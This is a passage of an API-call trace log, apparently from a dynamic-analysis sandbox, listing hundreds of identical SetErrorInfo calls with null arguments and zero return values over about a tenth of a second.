[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.158] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.159] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.160] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.160] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.173] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.174] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.175] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.176] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.177] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.178] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.179] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.179] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.179] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.179] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.179] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.179] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.180] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.180] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.180] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.180] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.180] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.181] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.182] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.182] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.182] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.182] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.183] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.184] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.184] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.184] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.184] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.184] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.185] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.185] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.185] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.185] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.185] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.186] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.187] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.187] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.187] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.187] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.187] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.187] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.188] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.189] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.190] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.191] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.193] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.194] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.195] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.196] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.197] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.198] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.199] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.200] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.200] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.206] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.207] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.222] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.222] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.222] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.223] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.223] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.223] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.224] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.236] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.237] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.260] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.261] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.261] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.261] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.262] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
[0061.262] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0
